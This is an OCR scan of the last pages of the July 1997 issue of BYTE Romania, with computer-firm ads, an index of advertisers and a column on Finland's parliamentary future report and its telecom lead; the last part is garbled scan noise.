dimensiune costă
80$
Puteți obține informaţii
suplimentare la:
Computer Press Agora
Tel.: 065-166516
065-166257
“DISTRIBUITOR UNIC AL FIRMEI ME FST
t Multimedia AG
MOVIE MACHINE, FPS 60, AV MASTER, VIDEO MACHINE
- echipamente multimedia pentru achizitia
de semnal video si audio
- posibilitate de editare digitală on-line, mixaj video
- sisteme de compresie de tip MJPEG și MPEG
Şefa - editare a efectelor digitale
3700 Oradea ROMÂNIA, str. Roșiorilor nr.1
tel./ fax: 0040-(0)59-436281, tel: 0040-(0)59-137700, 137794, 419805, 419806
Total pi
RER (iezi
tel/fax: 065-162614
e-mail: info@netsoft.ro
128 BYTE Romania IULIE 1997 www.agora.ro/byte/
SE As oan a,
INDEXUL ÎNSERENȚILOR
Nr. Firma Pag. Telefon Nr. Firma Pag. Telefon:
A 21 Imperial Electric 126 01-6871547
1 ACT 126 01-6377156 22 InterComp 85 01-3238255
2 Ager Business Tech 120 01-4103303
3 AQZalău 122 060-634141
K
23 Keysys Gfx Oradea 128 059-436281
Cc
4 Canon 9 01-2233854
5 Cipro 123 01-2200400 M |
6 Computer Land 42 01-3367599 24 MB Distribution Cil 01 -2305127
7 Computer PressAgora 92,94,9%,121 065-166516 25 MINOLTA România 2 01-6346245
8 CoRESTrade 126 056-190051 26 Multimedia Automex România 81 061-761845
D N
9 Digital România 82 01-2105508 27 National Instruments 126 US(512)795-8411
28 Netsoft 128 065-166516
E o
10 EUnet Romania 45 01-4100100 29 Orcas Birotica 128 01-2117780
11 Expert System Plus 102 01-2108565
12 Export Consult 55 01-3304549
P
30 Prince Software 126 032-212559
|. - : |
13 Flamingo Computers Cll 01-2225041
14 Forte Company 1 01-3122360 e
15 FROsys 126 064-430805 31 Romsys 5 01-2300810
G 4
16 Gemini SP 102 01-2108565 32 Salient Romania 3 01-2121790
17 Genesys Software 117,126 01-6384944 „38 Sprint Computers CIV 044-110700
34 Starsoft 18 051-415800
35 S&T 11 01-3307217
Hi Sirom Graphics 110 01-2300478
18 Hotsoft 106 065-166516
T
3 36 Tehnorom 126 032-116502
19 “1G: Romania 17 _01-2506175 37 Tornado Sistems 118 041-618580
20 Imation | 4 092-200722 38 Tricorp Electronics 126,128 01-6794879
îi i a
=
îi ua Ş
runzărind printre scrisorile
venite în reacţie la o teză cel
puţin interesantă pusă în dis-
cutie pe Synapse, la www.hot-
wired.com -,,On the Internet, geeks are no
longer outsiders; they run the place“ - relativ
la felul in care cei-ce-nu-ncap-in-tipare
ajung nu numai să nu (mai) fie marginalizati
de societate, ci să aibă un rol determinant
in ea - am dat peste o trimitere la un titlu
incredibil: ,,Finland and the Future of the
Future of Europe“.
Autorul scrisorii - Alex, un englez - rela-
ta, printre altele, cît de impresionat a fost
de un raport cu acest titlu, prezentat la o
conferinţă la care participase, şi mai ales de
modul în care erau puse problemele, din
care reiesea cît de serios se implica parla-
mentul și guvernul finlandez în abordarea
sistematică a comunicaţiilor ca o compo-
nentă de interes naţional vital în abordarea
Viitorului - și nu numai a viitorului imedi-
at (pînă la alegerile viitoare...) ci a celui de
perspectivă lungă.
Ştiam că în Finlanda se întîmplă lucruri
interesante - dar nu știam mai nimic despre
cum s-a ajuns la ele. Așa că am trimis rapid
un e-mail.
După 15 minute aveam un răspuns care
mai domolea un pic entuziasmul meu - titlul
care mă frapase nu era rodul unui efort de
durată, nici al unei inspiraţii de moment,
ci pur şi simplu rezultatul unei greşeli de
editare...
Oricum, am aflat că raportul cu pricina
probabil nu este disponibil pe web; toto-
dată am primit adresa de e-mail a unei
persoane - Paula, o finlandeză - care proba-
bil îmi va putea da alte detalii. Evident, am
forwardat mesajul către noua adresă de e-
mail; atît mesajul meu inițial, cât și răspun-
sul primit, plus trei cuvinte în faţă care să
130 BYTE România IULIE 1997
IMc
Finlanda si viitorul
viitorului Europei
afirme interesul meu în chestiune.
De data asta răspunsul nu a mai venit
imediat - oficialităţile sînt oficialități în orice
tara, chiar şi în Finlanda.
- Dara douazi, dimineaţa, în cutia postală
era şi răspunsul aşteptat, împreună cu tex-
tul complet al raportului. Acesta, în forma
în care era - nici nu știu exact în ce format,
Word-ul l-a importat fără să comenteze, dar
macinind aproape 15 minute a el, ceea ce
era să mă facă să rebootez gîndind lucruri
de nepus pe hîrtie relativ la Microsoft - se
întinde pe 175 de pagini, scrise, adevărat,
ca pentru parlamentari, cu fonte de minim
12 şi margini generoase.
Cuvîntul înainte merită, cred, reprodus
măcar parţial, poate îl mai vede cineva din
cei care-și aruncă ochii pe el:
ss We must have cultural roots - but above
all we need wings to bear us into the future.
The Parliament of Finland has wished to
assume an active role in the discourse on the
future of the nation. It has obliged the
Government to submit a report on the
future once each parliamentary term. In it,
the Government defines its perception of the
country's future and of the measures that
will be needed over a time span of 5-15
years. Parliament has appointed the Com-
mittee for the Future to deliberate and reply
to the Government's report. Parliament
deliberates the Committee's report in ses-
sion and adopts it with any amendments
that have been made, whereupon it becomes
a resolution of Parliament binding on the
Government.“
As minti afirmind ca am citit raportul din
scoarta-n scoarță. 175 de pagini e mult peste
ceea ce pot accepta dintr-o dată - chiar dacă
este foarte interesant. Cine a parcurs mai
în urmă rapoartele Clubului de la Roma, nu
va fi surprins de tonul raportului - docu-
mentat, serios, puţin îngrijorat. Demn de
= Clțit.
Cert este că Finlanda este o ţară intere-
santă din multe puncte de vedere. Nu numai
pentru cele 1000 de lacuri, şi nu numai pen-
tru Paavo Nurmi sau Jan Sibelius. Şi nu
neapărat pentru numele ce apar la rubrica
„Famous Finns Today“ pewww.vn.fi: Kari-
ta Mattila, Esa-Peka Salonen, Jukka-Pekka
Saraste sau Marta Tikkanen. Ci, poate, pen-
tru că Telecom Finland este în prezent pro-
prietarul celei mai dezvoltate rețele ATM
din lume. O tara de 5 milioane de locuitori,
„ aşaptea ca suprafață în Europa, şi-a asumat
responsabilitatea unui pariu cu viitorul:
dacă ATM-ul se impune, mai marii tehnolo-
giei vor fi finlandezii, iar Mecca AT M-işti-
lor va fi la Helsinki.
Pînă atunci, Telecom Finlanda
(www.tfi.net) se mai laudă cu cel mai mare
„procent de penetrare“ din lume la GSM -
30% - şi cu telemedicina devenită fapt
cotidian...
Nu mă astept ca miine să apară prin Inter-
net - şi nu numai - titluri gen „România şi
viitorul viitorului Europei“. Dar nu văd de
ce n-ag spera în el. Şi de ce nu m-aș bucura
citind în SunExpert, aprilie97, o declaraţie
a lui John Quarterman care sună cam așa:
„If you want to be part of a big crowd,
goto Comdex. If you want networking suits,
go to Interop or Internet World. If you want
an intense schedule and a small group of
knowledgeable people from half the world,
go to ROSE in Romania or APRICOT in
Hong Kong. It's all a matter of taste...“
ee Iosif Fettich
ifettich@netsoft.ro
RN ON Pa grea
a
Contează pe puterea, siguranța și flexibilitatea lui...
su ileana ee
une po
puterea procesorulut=
Intel Pentium Pro ‘
ia interfeței ULTRA SCS
daptec AHA 2940U;
e siguranţa datelor puse la dispoziție
de memoriile cu paritate: Siemens
și de unitatea ee ui
e viteza și stabilitatea hard discului
Quantum Atlas Il;
d flexibilitatea arhiţecturii ATX.
FLAMINGO
Pi ton boot ta
cy
Bd. N. Titulescu 121, Bd. Știrbei Vodă 154, Sos. Pandurl 29-31, „Calea Bucureşti 23B, - Calea lui Traiani
: Sector 1, Bucuresti Sector 1, Bucuresti Sector 5, Bucuresti Craiova 176 bis, Rm. Vâlcea
8 > Tel : 01-222.50.41 7 Tel : 01-638.35.38 ) Tel 01-410.36.23 3 Tel: 051-417.426 > Tel: 050-737.220
Fax: 01-222.59.41 i. Fax: 01-638.35.38 52, Fax: 01-410.56.06 3 Fax: 051-417.428 ÎN Fax: 050-737.220
(, titulescuOflamingaito ÎI , stirbeiOflamingoiro ( PânduriQflamingoe ȚĂ craiovaGflamingoită | € valceaQflamingo.to
BP Pe eee a i a a Re dis tt wT 1 POT PAE) i Rule) uta 44 el aNd A ua oua mpi a hic ie lie meri eo a ee
dA hh hc oR MO aL eel Saele Ade ee Egg neg SEO Peake cerea ca piesa DEA a be ee
„-__ “8461-60 Laie tte eh aT TA= Dae Oh t= [- Mie 2) 2) 21 O10] 0142) ac clo) LR 20-1 2-10 leas Mc oom eye Ean I¢ efit Rome cl a meT eliqueseg Lz ‘Pg ‘YDS-INIHdS - a MOPNGMIsSIG
da Ee dete cece BN CC eat 2 oem Ki on IL O NT dae n SRC UC INN Tie SUL: ec] 0012) dard ard o-oo eli cto Ree TIN Te Ti one IE Sarat olin
4
Se
9
pu =
ae m a z
Lj a e i = oo
O : za E
: “s Do i
oo : 18 oe Ty oD
a Be Li = ots
9 Er ae ca EI) Loe
d= > Pg N o E
O Oo - os 33
c¢ © W j E A
Ss = Cx =
E E a a:
O FREZE p, rs Se
LB = CE
3 = ae :
(O O. eee Le; ea a) nO
- ee a
f= i d eee ©)
> e CO = Lea
O paz) La]
© = 5S ¢
Ti = =: Oo ©
¢ .—) O ro: „0 —
as} = ee ee oe
ee oe ee
i eo o od ui DO
> : ZE E on og ane.
i ore EO
CD (e, O e =
e Z 92 ei geoe
a-i
QO 2e rasi eS eS)
© ee ee = CE £ zi
ema ae
ec ee ae ce
(e) rab) D
ese oe es ge
Erei ae ee eas)
fom ©) er 5 te
SER eT DD = NY =e
7) a Pa = E
SFr Sa a
eee, |
a [a] [ea ee |
oo iza Aud ci E EA
bd ao) O C-AR
a a 4
© O as
: = a) aS
a OO CUI RONI
PS | oe = = i
| ARIE Re Se ee Mer eres Dy a camee eee ar SE NR ee See ae oe ee een a =